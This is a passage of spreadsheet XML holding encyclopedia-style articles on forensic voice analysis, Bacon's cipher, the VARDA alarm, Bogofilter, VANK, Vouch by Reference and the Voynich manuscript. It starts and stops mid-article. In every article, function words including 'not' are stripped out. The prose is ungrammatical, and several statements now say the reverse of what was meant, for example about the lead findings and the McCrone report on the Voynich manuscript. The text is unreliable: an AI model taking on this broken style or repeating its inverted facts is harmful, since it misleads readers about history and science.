experiments accurate results. voice experts important physical examination vocal cords neurological examination ensure success surgery trained ear. perceptual evaluation voice heavily reliant voice quality, factor assessed preferably voice specialists (speech therapists). professional voice analyzer trained block excess variants deceptive results. forensics voice analysis used branch forensic science called audio forensics. these analyses generally performed evidence purposes evaluating authenticity audio question, enhancing features audio hidden beneath distracting background noise, interpreting audio perspective forensic expert, cases purposes speaker identification.an expert employ variety techniques analysis. minimum procedures "critical listening, waveform analysis, spectral analysis". critical listening involves thorough breakdown foreground background sounds repetitive listening. waveform analysis visualizes audio examiner irregularities occur. spectral analysis visualizes frequency audio examiner pick features interest.one case audio played larger role trayvon martin case, recording call made police analyzed determine background screams came george zimmerman martin. forensic voice experts forensic voice analyze recordings examining transmitted stored speech, enhancing decoding criminal investigations, court trials, federal agencies. utilize audio recordings court, forensic phonetician must authenticate recording detect tampering, enhance audio, interpret speech. their first ensure speech recording used comprehensible. oftentimes, samples poor sound quality environmental factors wind movement. other times sound degradation technological issues within recording device. investigative work speaker identification cannot done recording proper quality. different solutions poor comprehensibility done using computer programs allow user filter eliminate noise. computer software also able convert speech spectra waveforms, useful forensic phonetician. however, work done recording done copy original recording made. main part forensic phonetician's speaker identification. interpretation process might include piecing together timeline, transcribing dialog, identifying unknown unintelligible sounds audio recording. court, expert ultimately serves explain facts surrounding audio evidence, providing explanation relevant acoustical physical principles explain evidenced recording. reports made include detailed information, section recording comprehensible inaudible, explanation happening recording), description missing recording. speaker identification voice analysis role speaker identification. this identity speaker unknown, identify array voices suspects pertaining crime investigation court trial. proper identification speaker voices particularly criminal cases depend list factors, like familiarity, exposure, delay, tone voice, voice disguising, accents. familiarity speaker increases chances properly identifying voice, distinguishing amount exposure voice also aids correctly identifying voice, even unfamiliar one. hearer listen longer utterance exposed voice often better recognizing voice, someone perhaps able hear word. delay time hearing voice time identifying speaker also decreases prospect identifying correct speaker. tone voice affects ability identify right speaker. tone match speaker time comparison, prove difficult analyse. disguise voice, example speaker whispering, also hinder ability accurately match identify speaker. cases, individuals speak language speaker whose voice analysed easier time identifying accent stress voice. speaker identification additionally complicated distortions technical method recording speaker based issues, emotional states alternative motives causing discrepancy voice recording. methods speaker identification forensics include earwitnesses used identify voices heard, aural-perceptual approach conducted specialist regarding suprasegmentals individual's speech, computer-based approaches. also references external links voice problems vocal disorder online community (voicematters.net)</t>
  </si>
  <si>
    <t>Bacon's cipher</t>
  </si>
  <si>
    <t>bacon's cipher baconian cipher method steganographic message encoding devised francis bacon 1605. message concealed presentation text, rather content. cipher details encode message, letter plaintext replaced group five letters 'b'. this replacement 5-bit binary encoding done according alphabet baconian cipher (from latin alphabet), shown below: second version bacon's cipher uses unique code letter. words, pattern variant: writer must make different typefaces cipher. after preparing false message number letters real, secret message, typefaces chosen, represent then letter false message must presented appropriate typeface, according whether stands b.to decode message, reverse method applied. each "typeface letter false message replaced "typeface letter replaced baconian alphabet used recover original message. method writing message allows distinct representations character used bacon cipher. bacon prepared biliteral alphabet handwritten capital small letters alternative forms, used this published illustrated plate augmentis scientiarum (the advancement learning). because message right length used carry encoding, secret message effectively hidden plain sight. false message topic thus distract person seeking find real message. baconian cipher example word 'steganography', encoded quotation marks, standard text represents "typeface text boldface represents "typeface encode message letter plaintext replaced group five letters 'b'. pattern standard boldface letters aabbaa aaabaaa abba aaaaaa bbabaabba aaaaaaaa baaab babb abbaabb 'b'. this decodes groups five baaab(s) baaba(t) aabaa(e) aabba(g) aaaaa(a) abbaa(n) abbab(o) aabba(g) baaaa(r) aaaaa(a) abbba(p) aabbb(h) babba(y) bbaaa bbaab bbbbb last three groups, unintelligible, assumed form part message. bacon shakespeare some proponents baconian theory shakespeare authorship, elizabeth wells gallup, claimed bacon used cipher encode messages revealing authorship first folio. however, american cryptologists william elizebeth friedman refuted claims works shakespeare contain hidden ciphers disclose bacon's candidate's secret authorship shakespeare ciphers examined (1957). typographical analysis first folio shows large number typefaces used, instead required cipher, printing practices time would made impossible transmit message accurately.the friedmans' tombstone included message bacon's cypher spotted many years. also baudot, 5-bit codes english alphabet, used world-wide teleprinter communications 20th century. references further reading william friedman elizebeth friedman, shakespearean ciphers examined, cambridge university press, 1957 external links make anything signify anything</t>
  </si>
  <si>
    <t>Voice-activated radio-dispatched alarm</t>
  </si>
  <si>
    <t>voice-activated radio-dispatched alarm, varda-alarm, type burglar alarm that, activated "tripped", broadcasts type alarm transmitter location local police radio frequency using pre-recorded audio message.in 1968, voice-activated radio dispatched alarm (varda), invented. portable device that, activated, broadcast message dispatch channel, allowing officers immediately respond scene investigation. although varda originally designed enforcement applications repeat break-ins, domestic violence issues metal/equipment theft, concept adapted time address variety needs private sector.this type alarm installed special monitoring location recent burglaries. when alarm activated, voice message directly radio frequency (generally non-primary frequency), repeating message several times. example: "burglary progress, union street." message repeat alarm reset, usually manually. also amateur radio emergency communications emergency alert system message bottle smoke signals references external links technology community policing series santa cruz regional 9-1-1 memo subject: alarms general date issued: june 1996 date revised: november 2011</t>
  </si>
  <si>
    <t>Bogofilter</t>
  </si>
  <si>
    <t>bogofilter mail filter classifies e-mail spam (non-spam) statistical analysis message's header content (body). program able learn user's classifications corrections. originally written eric raymond read paul graham's article plan spam" maintained together group contributors david relson, matthias andree greg louis. statistical technique used known bayesian filtering. bogofilter's primary algorithm uses f(w) parameter fisher inverse chi-square technique describes. bogofilter mail client classify messages delivered recipient mailboxes, used classify messages received sending smtp server. bogofilter examines tokens message body header, refers wordlists stored berkeleydb, sqlite qdbm calculate probability score message spam. bogofilter provides processing plain text html supports reading multi-part mime message including base64, quoted-printable, uuencoded text html. bogofilter ignores non-text attachments, images. possible tune bogofilter's statistical algorithms modifying various coefficients settings configuration file, using automated bogotune utility included software, attempts optimise various coefficients maximise filtering efficiency particular corpus spam non-spam. standard tests trec 2005 show bogofilter compares well competitors spambayes, crm114 dspam. other competitors include, limited spamprobe qsf. bogofilter written runs linux, freebsd, netbsd, openbsd, solaris, hp-ux, platforms. released gpl. also blacklist greylisting whitelist tarpit references external links official homepage "bogofilter". freecode. plan spam essay paul graham discussing main ideas behind programthis article, earlier revision edited bogofilter's homepage.</t>
  </si>
  <si>
    <t>Voluntary Agency Network of Korea</t>
  </si>
  <si>
    <t>vank (반크), acronym voluntary agency network korea (korean: 외교사절단), internet-based south korean organization funded korean government established 1999, consisting 120,000 south korean members 30,000 international members. they refer "cyber diplomatic delegation group", mainly involved spreading information korea world. they politically motivated activities frequently promote korean government's claims various japan-korea china-korea disputes. park ki-tae, founder vank, said "the project aimed isolating japan". vank's membership consists mainly junior high high school students, although university students also participate. activities examples campaigns conducted include spreading story ancient kingdom goguryeo, jikji, world's oldest extant book printed using movable metal type.vank publishes reading materials, postcards, maps, videos. vank's self-built online database published books information korea acknowledged overseas universities recommended learning resources korea. exchange cultures connect foreigners, vank also conducts surveys opinions korea, notable survey aspects korea interest foreigners most.vank disputes certain terms information regarding korea's geographic names korean history. head voluntary agency network korea said organization corrected hundreds mistaken statements foreign governments south korea. vank also raises awareness japanese crimes.in 2013, vank launched campaign tokyo olympic paralympic games. campaign included letter international olympic committee (ioc) opposing games "japan remorse crimes.”, letter also sent major foreign media york times. january 2020, poster temporary fence site japanese embassy jong chiyo road, nono district. posters, tokyo games contaminated nuclear radiation, scene olympic torch relay depicted hazmat suit transporting radioactive material. they also produced stamps coins similar imagery.vank urged chinese netizens stop cyberbullying korean celebrity singer hyo-ri instagram account received several complaints criticisms. vank posted online petition titled "stop china's cyber chauvinism lynched korean celebrity!". justified petition basis oppose chauvinistic attitude attacking others name nationalism, includes interpreting even smallest part expression vicious offensive way".in 2019, vank launched campaign expression chinese year, recommending term "lunar year" instead. funding vank non-governmental private organization. according vank, receive money organization corporation, donations. fact, receive funds ministry education, science technology south korea, along multiple corporate donors. amount paid government decreased, million 2006 ($1=w950 2006, around $84,000)to million 2008 ($1=w1,300 2008, around $24,000). criticism vank organizes young korean students "cyber diplomats" lobby foreign organizations webmasters perceives errors matters related korea. government korea endorses "cyber vigilantism", subsidising competition participants censor foreign websites "incorrect" content korea. park jung-yul, official korean information service (kois) said "kois resolved monitor contents korea-related sites provide correct information order help generate accurate image country." asia times online, reported south korean government offering rewards students participate activities vank, centered issues japan.vank lists current targets "correction" website members send form letter protest. some requests correction justifiable, referring simple mistake mixing north south korea. however, relation highly contentious issues accept non-korean interpretations. foreign policy article, vank described seen "self-styled cyber fact-checkers" favourable cause others seen "hyper-nationalistic spammers".although official foreign government agencies tend endure cyber harassment, numerous private organisations websites surrender silence vank's clamour. about.com spokesman, relating company's decision name "east sea" refer body water otherwise known japan, stated chose name "not necessarily agreed south korean geography activists e-mail bombardment annoying." about.com case, received e-mails year finally changed name. likewise, national geographic society websites changed naming policies result similar "e-mail letter writing campaigns".vank accused promoting korea attacking japan. critics claim vank attempted bully discount japan japanese culture, manipulate history world countries believe distorted perspectives related japanese-korean history bias favoring korea.vank also accused attacking china chinese culture. however, much less persistent towards historical geographical issues china. vank never challenged name "yellow sea" normally referred "sohae" (meaning "west sea") koreans. also anti-japanese sentiment korea anti-chinese sentiment korea internet activism spamming cent party references external links official website vank official youtube channel</t>
  </si>
  <si>
    <t>Vouch by Reference</t>
  </si>
  <si>
    <t>vouch reference (vbr) protocol used internet mail systems implementing sender certification third-party entities. independent certification providers vouch reputation senders verifying domain name associated transmitted electronic mail. information used message transfer agent, mail delivery agent email client. protocol intended become standard email sender certification, described 5518. operation email sender user email certification service signs messages using domainkeys identified mail (dkim) includes vbr-info field signed header. sender also sender policy framework authenticate domain name. vbr-info: header field contains domain name certified, typically responsible domain dkim signature tag), type content message, list vouching services, domain names services vouch sender kind content: vbr-info: md=domain.name.example; mc=type; mv=vouching.example:vouching2.example email receiver email receiver authenticate message's domain name using dkim spf, thus finding domains responsible message. obtains name vouching service trusts, either among supplied sender locally configured preferred vouching services. using domain name system, receiver verify whether vouching service actually vouches given domain. receiver queries resource record name composed: domain.name.example._vouch.vouching.example returned data, any, space-delimited list types service vouches, given lowercase ascii. they match self-asserted message content. types defined transaction, list, all. auditing message allow establish whether content corresponds. result authentication saved header field, according 6212, like authentication-results: receiver.example; vbr=pass header.mv=vouching.example header.md=domain.name.example implementations variations opendkim mdaemon messaging server alt-n technologies among first software implementations vbr. opendkim provides milter well standalone library. roaring penguin software's canit anti-spam filter supports version 7.0.8 released 2010-11-09.spamhaus released spamhaus whitelist includes domain based whitelist, dwl, domain name queried e.g., dwltest.com._vouch.dwl.spamhaus.org. although standard specifies resource records, following long established dnsbl practice, spamhaus also assigned resource records values 127.0.2.0/24 whitelist return codes. possibility query address allow easier deployment existing code. however, techfaq recommends checking domain (the value tag) valid dkim-signature querying corresponding record, howto gives details inserting vbr-info header fields messages signed whitelisted domains. 2013, protocol authors considered flop. references</t>
  </si>
  <si>
    <t>Voynich manuscript</t>
  </si>
  <si>
    <t xml:space="preserve">voynich manuscript illustrated codex hand-written otherwise unknown writing system, referred 'voynichese'. vellum written carbon-dated early 15th century (1404–1438), stylistic analysis indicates composed italy italian renaissance. origins, authorship, purpose manuscript debated. various hypotheses suggested, including otherwise unrecorded script natural language constructed language; unread code, cypher, form cryptography; simply meaningless hoax. manuscript currently consists around pages, evidence additional pages missing. some pages foldable sheets varying size. most pages fantastical illustrations diagrams, crudely coloured, sections manuscript showing people, fictitious plants, astrological symbols, etc. text written left right. manuscript named wilfrid voynich, polish-lithuanian book dealer purchased 1912. since 1969, held yale university's beinecke rare book manuscript library.the voynich manuscript studied many professional amateur cryptographers, including american british codebreakers world world manuscript never demonstrably deciphered, none many hypotheses proposed last hundred years independently verified. mystery meaning origin excited popular imagination, making subject study speculation. yale university published manuscript online entirety—225 pages—in digital collections library. description codicology codicology, physical characteristics manuscript, studied researchers. manuscript measures 23.5 16.2 (9.3 in), hundreds vellum pages collected quires. total number pages around 240, exact number depends manuscript's unusual foldouts counted. quires numbered various locations, using numerals consistent 1400s, righthand corner recto (righthand) page numbered 116, using numerals later date. from various numbering gaps quires pages, seems likely that, past, manuscript least pages quires, already missing wilfrid voynich acquired manuscript 1912. there strong evidence many book's bifolios reordered various points history, original page order well quite different today. parchment, covers, binding samples various parts manuscript radiocarbon dated university arizona 2009. results consistent samples tested indicated date parchment 1404 1438. protein testing 2014 revealed parchment made calf skin, multispectral analysis showed written manuscript created (i.e., palimpsest). quality parchment average deficiencies, holes tears, common parchment codices, also prepared much care skin side largely indistinguishable flesh side. parchment prepared least fourteen fifteen entire calfskins".some folios (e.g., thicker usual parchment.the goat skin binding covers original book, date possession collegio romano. insect holes present first last folios manuscript current order suggest wooden cover present later covers. discolouring edges points tanned-leather inside cover. many pages contain substantial drawings charts colored paint. based modern analysis using polarized light microscopy (plm), determined quill iron gall used text figure outlines. drawings, text, page quire numbers similar microscopic characteristics. 2009, energy-dispersive x-ray spectroscopy (eds) revealed inks contained major amounts carbon, iron, sulfur, potassium calcium trace amounts copper occasionally zinc. show presence lead, x-ray diffraction (xrd) identified potassium lead oxide, potassium hydrogen sulphate, syngenite samples tested. similarity drawing inks text inks suggested contemporaneous origin. paint colored paint applied (somewhat crudely) outlined figures, possibly later date. blue, white, red-brown, green paints manuscript analyzed using plm, xrd, eds, scanning electron microscopy (sem). blue paint proved ground azurite minor traces copper oxide cuprite. white paint likely mixture eggwhite calcium carbonate. green paint tentatively characterized copper copper-chlorine resinate; crystalline material might atacamite copper-chlorine compound. analysis red-brown paint indicated ochre crystal phases hematite iron sulfide. minor amounts lead sulfide palmierite possibly present red-brown paint.the pigments used deemed inexpensive. retouching computer scientist jorge stolfi university campinas highlighted parts text drawings modified, using darker fainter, earlier script. evidence visible various folios, example f1r, f3v, f26v, f57v, f67r2, f71r, f72v1, f72v3 f73r. text every page manuscript contains text, mostly unidentified language, extraneous writing latin script. bulk text 240-page manuscript written unknown script, running left right. most characters composed simple strokes. there exists dispute whether certain characters distinct, script 20–25 characters would account virtually text; exceptions dozen rarer characters occur twice each. there obvious punctuation.much text written single column body page, slightly ragged right margin paragraph divisions sometimes stars left margin. other text occurs charts labels associated illustrations. there indications errors corrections made place document. ductus flows smoothly, giving impression symbols enciphered; delay characters, would normally expected written encoded text. extraneous writing only words manuscript thought written unknown script: f1r: sequence latin letters right margin parallel characters unknown script, also now-unreadable signature "jacobj tepenece" found bottom margin. f17r: line writing latin script margin. f66r: small number words bottom left corner near drawing nude read "der mussteil", high german phrase widow's share". f70v–f73v: astrological series diagrams astronomical section names months (from march december) written latin script, spelling suggestive medieval languages france, northwest italy, iberian peninsula. f116v: four lines written rather distorted latin script, except words unknown script. words latin script appear distorted characteristics unknown language. lettering resembles european alphabets late 14th 15th centuries, words seem make sense language. whether bits latin script part original text added later known. transcription various transcription alphabets created equate voynich characters latin characters help cryptanalysis, extensible (originally: european) voynich alphabet (eva). first major created "first study group", cryptographer william friedman 1940s, line manuscript transcribed punch card make machine readable. statistical patterns text consists 170,000 characters, spaces dividing text 35,000 groups varying length, usually referred "words" "word tokens" (37,919); 8,114 words considered unique "word types." structure words seems follow phonological orthographic laws sort; example, certain characters must appear word (like english vowels), characters never follow others, doubled tripled, others not. distribution letters within words also rather peculiar: some characters occur beginning word, (like greek always middle section. many researchers commented upon highly regular structure words. professor gonzalo rubio, expert ancient languages pennsylvania state university, stated: things know grammatical markers things occur commonly beginning words, language, used express grammar, never appear middle 'words' voynich manuscript. that's unheard indo-european, hungarian, finnish language. stephan vonfelt studied statistical properties distribution letters correlations (properties vaguely characterized rhythmic resonance, alliteration, assonance) found respect voynichese similar mandarin chinese pinyin text records grand historian text works european languages, although numerical differences voynichese mandarin chinese pinyin look larger mandarin chinese pinyin european languages.practically words fewer letters ten. some words occur certain sections, pages; others occur throughout manuscript. repetitions occur among thousand labels attached illustrations. there instances common word appears three times (see zipf's law). words differ letter also repeat unusual frequency, causing single-substitution alphabet decipherings yield babble-like text. 1962, cryptanalyst elizebeth friedman described statistical analyses "doomed utter frustration".in 2014, team diego amancio university paulo published study using statistical methods analyse relationships words text. instead trying find meaning, amancio's team looked connections clusters words. measuring frequency intermittence words, amancio claimed identify text's keywords produced three-dimensional models text's structure word frequencies. team concluded that, cases, voynich systems similar known books, indicating text actual language, random gibberish. framework exemplified analysis voynich manuscript, final conclusion differs random sequence words, compatible natural languages. even though approach aimed deciphering voynich, capable providing keywords could helpful decipherers future. linguists claire bowern luke lindemann applied statistical methods voynich manuscript, comparing languages encodings languages, found similarities differences statistical properties. character sequences languages measured using metric called second-order conditional entropy. natural languages tend voynichese much predictable character sequences, around however, higher levels organization, voynich manuscript displays properties similar natural languages. based this, bowern dismisses theories manuscript gibberish. likely encoded natural language constructed language. bowern also concludes statistical properties voynich manuscript consistent substitution cipher polyalphabetic cipher.as noted bowern's review, multiple scribes "hands" written manuscript, possibly using methods encoding least natural language. "language" voynich appears herbal pharmaceutical parts manuscript. "language" known voynich appears balneological section, parts medicinal herbal sections, astrological section. common vocabulary items voynich voynich substantially different. topic modeling manuscript suggests pages identified written particular scribe relate different topic.in terms morphology, visual spaces manuscript assumed indicate word breaks, consistent patterns suggest three-part word structure prefix, root midfix, suffix. certain characters character combinations likely appear particular fields. there minor variations voynich voynich predictability certain letters relatively small number combinations certain parts words appears explain entropy (h2) voynichese. absence obvious punctuation, variants word appear specific typographical positions, beginning paragraph, line, sentence.the voynich word frequencies variants appear conform zipfian distribution, supporting idea text linguistic meaning. this implications encoding methods likely used, since forms encoding interfere zipfian distribution. measures proportional frequency common words similar semitic, iranian, germanic languages. another measure morphological complexity, moving-average type–token ratio (mattr) index, similar iranian, germanic, romance languages. illustrations illustrations conventionally used divide manuscript different sections, since text cannot read. each section typified illustrations different styles supposed subject matter except last section, drawings small stars margin. following sections conventional names: herbal, folios: each page displays plants paragraphs text, format typical european herbals time. some parts drawings larger cleaner copies sketches seen "pharmaceutical" section. none plants depicted unambiguously identifiable. astronomical, folios: contains circular diagrams suggestive astronomy astrology, suns, moons, stars. series diagrams depicts conventional symbols zodiacal constellations (two fish pisces, bull taurus, hunter crossbow sagittarius, etc.). each female figures arranged concentric bands. most females least partly nude, holds appears labeled star shown star attached either could tether cord kind. last pages section lost (aquarius capricornus, roughly january february), aries taurus split four paired diagrams women stars each. some diagrams fold-out pages. balneological, folios: dense, continuous text interspersed drawings, mostly showing small nude women, wearing crowns, bathing pools tubs connected elaborate network pipes. bifolio consists folios (verso) (recto); forms integrated design, water flowing folio other. cosmological, folios: more circular diagrams, obscure nature. this section also foldouts; spans pages, commonly called rosettes folio, contains diagram nine "islands" "rosettes" connected "causeways" containing castles, well might volcano. pharmaceutical, folios: many labeled drawings isolated plant parts (roots, leaves, etc.), objects resembling apothecary jars, ranging style mundane fantastical, text paragraphs. recipes, folios: full pages text broken many short paragraphs, marked star left margin.five folios contain text, least folios missing manuscript. purpose overall impression given surviving leaves manuscript meant serve pharmacopoeia address topics medieval early modern medicine. however, puzzling details illustrations fueled many theories book's origin, contents text, purpose intended.the first section book almost certainly herbal, attempts failed identify plants, either actual specimens stylized drawings contemporaneous herbals. only plant drawings identified reasonable certainty, wild pansy maidenhair fern. herbal pictures match pharmacological sketches appear clean copies them, except missing parts completed improbable-looking details. fact, many plant drawings herbal section seem composite: roots species fastened leaves another, flowers third.astrological considerations frequently played prominent role herb gathering, bloodletting, medical procedures common likeliest dates manuscript. however, interpretation remains speculative, apart obvious zodiac symbols diagram possibly showing classical planets. history much early history book unknown, though text illustrations characteristically european. 2009, university arizona researchers radiocarbon dated manuscript's vellum 1404 1438. addition, mccrone associates westmont, illinois found paints manuscript materials expected period european history. there erroneous reports mccrone associates indicated much added long creation parchment, official report contains statement this.the first confirmed owner georg baresch, 17th-century alchemist prague. baresch apparently puzzled "sphynx" "taking space uselessly library" many years. learned jesuit scholar athanasius kircher collegio romano published coptic (egyptian) dictionary claimed deciphered egyptian hieroglyphs; baresch twice sent sample copy script kircher rome, asking clues. 1639 letter baresch kircher earliest known mention manuscript confirmed.whether kircher answered request known, apparently interested enough acquire book, baresch refused yield. upon baresch's death, manuscript passed friend marek marci (also known johannes marcus marci), rector charles university prague. years later, marci sent book kircher, longtime friend correspondent.marci also sent kircher cover letter latin, dated august 1665 1666) still attached book voynich acquired reverend distinguished sir, father christ: this book, bequeathed intimate friend, destined you, dear athanasius, soon came possession, convinced could read except yourself. former owner book asked opinion letter, copying sending portion book believed would able read remainder, time refused send book itself. deciphering devoted unflagging toil, apparent attempts send herewith, relinquished hope life. toil vain, sphinxes obey master, kircher. accept token, long overdue though affection you, burst bars, any, wonted success. raphael, tutor bohemian language ferdinand iii, king bohemia, told said book belonged emperor rudolph presented bearer brought book ducats. believed author roger bacon, englishman. point suspend judgement; place define view take thereon, whose favor kindness unreservedly commit remain command reverence, joannes marcus marci cronland prague, 19th august, 1665 1666] "dr. raphael" believed raphael sobiehrd-mnishovsky, would gold. while wilfrid voynich took raphael's claim face value, bacon authorship theory largely discredited. however, piece evidence supporting rudolph's ownership almost invisible name signature, first page book, jacobus horcicky tepenecz, head rudolph's botanical gardens prague. rudolph died still owing money tepenecz, possible tepenecz given book simply taken partial payment debt. records book next years found, likelihood, stored rest kircher's correspondence library collegio romano (now pontifical gregorian university). probably remained troops victor emmanuel italy captured city 1870 annexed papal states. italian government decided confiscate many properties church, including library collegio. many books university's library hastily transferred personal libraries faculty happened, according investigations xavier ceccaldi others, books exempt confiscation. kircher's correspondence among books, apparently, voynich manuscript, still bears libris petrus beckx, head jesuit order university's rector time.beckx's private library moved villa mondragone, frascati, large country palace near rome bought society jesus 1866 housed headquarters jesuits' ghislieri college.in 1903, society jesus (collegio romano) short money decided sell holdings discreetly vatican library. sale took place 1912, manuscripts listed sale ended going vatican. wilfrid voynich acquired manuscripts, among bears name. spent next seven years attempting interest scholars deciphering script, worked determine origins manuscript.in 1930, manuscript inherited wilfrid's death widow ethel voynich, author novel gadfly daughter mathematician george boole. died 1960 left manuscript close friend anne nill. 1961, nill sold book antique book dealer hans kraus. kraus unable find buyer donated manuscript yale university 1969, catalogued 408", sometimes also referred "beinecke 408". timeline ownership timeline ownership voynich manuscript given below. time possibly created shown green (early 1400s), based carbon dating vellum. periods unknown ownership indicated white. commonly accepted owners 17th century shown orange; long period storage collegio romano yellow. location wilfrid voynich allegedly acquired manuscript (frascati) shown green (late 1800s); voynich's ownership shown red, modern owners highlighted blue. authorship hypotheses many people proposed possible authors voynich manuscript, among roger bacon, john edward kelley, giovanni fontana, voynich. early history marci's 1665/1666 cover letter kircher says that, according friend late raphael mnishovsky, book bought rudolf holy roman emperor king bohemia ducats (66.42 troy ounce actual gold weight, 2.07 kg). (mnishovsky died 1644, years earlier, deal must occurred rudolf's abdication 1611, least years marci's letter. however, karl widemann sold books rudolf march 1599.) according letter, mnishovsky (but necessarily rudolf) speculated author 13th-century franciscan friar polymath roger bacon. marci said suspending judgment claim, taken quite seriously wilfrid voynich, best confirm voynich contemplated possibility author albertus magnus roger bacon. assumption bacon author voynich conclude john sold manuscript rudolf. mathematician astrologer court queen elizabeth england known owned large collection bacon's manuscripts. scrier (spirit medium) edward kelley lived bohemia several years, hoped sell services emperor. however, sale seems quite unlikely, according john schuster, dee's meticulously kept diaries mention it.if bacon create voynich manuscript, supposed connection much weakened. thought possible, prior carbon dating manuscript, kelley might written spread rumor originally work bacon's hopes later selling it.: fabrication voynich some suspect voynich fabricated manuscript himself. antique book dealer, probably necessary knowledge means, lost book roger bacon would worth fortune. furthermore, baresch's letter marci's letter establish existence manuscript, voynich manuscript mentioned. these letters could possibly motivation voynich fabricate manuscript, assuming aware them. however, many consider expert internal dating manuscript june 1999 discovery baresch's letter kircher eliminated possibility.eamon duffy says radiocarbon dating parchment (or, accurately, vellum) "effectively rules possibility manuscript post-medieval forgery", consistency pages indicates origin single source, inconceivable" quantity unused parchment comprising least fourteen fifteen entire calfskins" could survived early 15th century. giovanni fontana suggested illustrations books italian engineer, giovanni fontana, slightly resemble voynich illustrations. fontana familiar cryptography used books, although voynich script simple substitution cipher. book secretum thesauro experimentorum ymaginationis hominum (secret treasure-room experiments man's imagination), written 1430, fontana described mnemonic machines, written cypher. that book bellicorum instrumentorum liber used cryptographic system, described simple, rational cipher, based signs without letters numbers. other theories sometime 1921, voynich able read name faintly written foot manuscript's first page: "jacobj tepenece". this taken reference jakub hořčický tepenec, also known latin name jacobus sinapius. rudolph ennobled 1607, appointed imperial distiller, made curator botanical gardens well personal physicians. voynich (and many people him) concluded jacobus owned voynich manuscript prior baresch, drew link rudolf's court, confirmation mnishovsky's story. jacobus's name faded since voynich still legible ultraviolet light. match copy signature document located hurych 2003. result, suggested signature added later, possibly even fraudulently voynich himself. baresch's letter bears resemblance hoax orientalist andreas mueller played athanasius kircher. mueller sent unintelligible text kircher note explaining come egypt, asking translation. kircher reportedly solved speculated cryptographic tricks played kircher make look foolish.raphael mnishovsky, friend marci reputed source bacon story, cryptographer apparently invented cipher claimed uncrackable 1618). this speculation mnishovsky might produced voynich manuscript practical demonstration cipher made baresch unwitting test subject. indeed, disclaimer voynich manuscript cover letter could mean marci suspected kind deception.in 2006 book, nick pelling proposed voynich manuscript written 15th-century north italian architect antonio averlino (also known "filarete"), theory broadly consistent radiocarbon dating. language hypotheses many hypotheses developed voynich manuscript's "language", called voynichese: ciphers according "letter-based cipher" theory, voynich manuscript contains meaningful text european language intentionally rendered obscure mapping voynich manuscript "alphabet" cipher sort—an algorithm operated individual letters. this working hypothesis 20th-century deciphering attempts, including informal team cryptographers william friedman early 1950s. counterargument almost cipher systems consistent fail match seen voynich manuscript. example, simple substitution ciphers would excluded distribution letter frequencies resemble known language, small number different letter shapes used implies nomenclator homophonic ciphers ruled out, typically employ larger cipher alphabets. polyalphabetic ciphers invented alberti 1460s included later vigenère cipher, usually yield ciphertexts cipher shapes occur roughly equal probability, quite unlike language-like letter distribution voynich manuscript appears have. however, presence many tightly grouped shapes voynich manuscript (such "or", "ar", "ol", "al", "an", "ain", "aiin", "air", "aiir", "am", "ee", "eee", among others) suggest cipher system make "verbose cipher", single letters plaintext enciphered groups fake letters. example, first lines page f15v (seen above) contain "oror strongly resemble roman numerals "ccc" "xxxx" would look verbosely enciphered. shorthand 1943, joseph martin feely claimed manuscript scientific diary written shorthand. according d'imperio, "latin, system abbreviated forms considered acceptable scholars, unanimously rejected readings text". steganography this theory holds text voynich manuscript mostly meaningless, contains meaningful information hidden inconspicuous details—e.g., second letter every word, number letters line. this technique, called steganography, described johannes trithemius 1499. though plain text speculated extracted cardan grille overlay cut-outs meaningful text) sort, seems somewhat unlikely words letters arranged anything like regular grid. still, steganographic claims hard prove disprove, stegotexts arbitrarily hard find. suggested meaningful text could encoded length shape certain strokes. natural language statistical analysis text reveals patterns similar natural languages. instance, word entropy (about bits word) similar english latin texts. amancio (2013) argued voynich manuscript mostly compatible natural languages incompatible random texts." linguist jacques suggested voynich manuscript text could little-known natural language, written plaintext invented alphabet. suggested chinese jest, later comparison word length statistics vietnamese chinese made view hypothesis seriously. many language families east central asia, mainly sino-tibetan (chinese, tibetan, burmese), austroasiatic (vietnamese, khmer, etc.) possibly (thai, lao, etc.), morphemes generally syllable.child (1976), linguist indo-european languages u.s. national security agency, proposed manuscript written "hitherto unknown north germanic dialect". identified manuscript "skeletal syntax several elements reminiscent certain germanic languages", content expressed using great deal obscurity."in february 2014, professor stephen university bedfordshire made public research using "bottom methodology understand manuscript. method involved looking translating proper nouns, association relevant illustrations, context languages time period. paper posted online offers tentative translation characters words. suggested text treatise nature written natural language, rather code.tucker talbert (2014) published paper claiming positive identification plants, animals, mineral referenced manuscript plant drawings libellus medicinalibus indorum herbis badianus manuscript, fifteenth-century aztec herbal. together presence atacamite paint, argue plants colonial spain text represented nahuatl, language aztecs. they date manuscript 1521 (the date spanish conquest aztec empire) circa 1576. these dates contradict earlier radiocarbon date vellum elements manuscript. however, argued vellum could stored used later date. analysis criticized voynich manuscript researchers, argued skilled forger could construct plants coincidentally passing resemblance theretofore undiscovered existing plants. constructed language peculiar internal structure voynich manuscript words william friedman conjecture text could constructed language. 1950, friedman asked british army officer john tiltman analyze pages text, tiltman share conclusion. paper 1967, brigadier tiltman said: after reading report, friedman disclosed belief basis script primitive form synthetic universal language developed form philosophical classification ideas bishop wilkins 1667 dalgarno little later. clear productions much systematic, anything kind would almost instantly recognisable. analysis seemed reveal cumbersome mixture different kinds substitution. concept constructed language quite old, attested john wilkins's philosophical language (1668), still postdates generally accepted origin voynich manuscript centuries. known examples, categories subdivided adding suffixes (fusional languages); consequence, text particular subject would many words similar prefixes—for example, plant names would begin similar letters, likewise diseases, etc. this feature could explain repetitious nature voynich text. however, able assign plausible meaning prefix suffix voynich manuscript. hoax fact manuscript defied decipherment thus various scholars propose text contain meaningful content first place, implying hoax. 2003, computer scientist gordon rugg showed text characteristics similar voynich manuscript could produced using table word prefixes, stems, suffixes, would selected combined means perforated paper overlay. latter device, known cardan grille, invented around 1550 encryption tool, years estimated creation date voynich manuscript. some maintain similarity pseudo-texts generated gordon rugg's experiments voynich manuscript superficial, grille method could used emulate language certain degree.in april 2007, study austrian researcher andreas schinner published cryptologia supported hoax hypothesis. schinner showed statistical properties manuscript's text consistent meaningless gibberish produced using quasi-stochastic method, described rugg, latin medieval german texts.some scholars claimed manuscript's text appears sophisticated hoax. 2013, marcelo montemurro, theoretical physicist university manchester, published findings claiming semantic networks exist text manuscript, content-bearing words occurring clustered pattern, words used shift topic. with evidence, believes unlikely features intentionally "incorporated" text make hoax realistic, required academic knowledge structures exist time voynich manuscript would written.in september 2016, gordon rugg gavin taylor addressed objections another article cryptologia, illustrated simple hoax method claim could caused mathematical properties text.in 2019, torsten timm andreas schinner published algorithm matches statistical characteristics voynich manuscript, could used medieval author generate meaningless text. glossolalia 2004 book, gerry kennedy churchill suggest possibility voynich manuscript case glossolalia 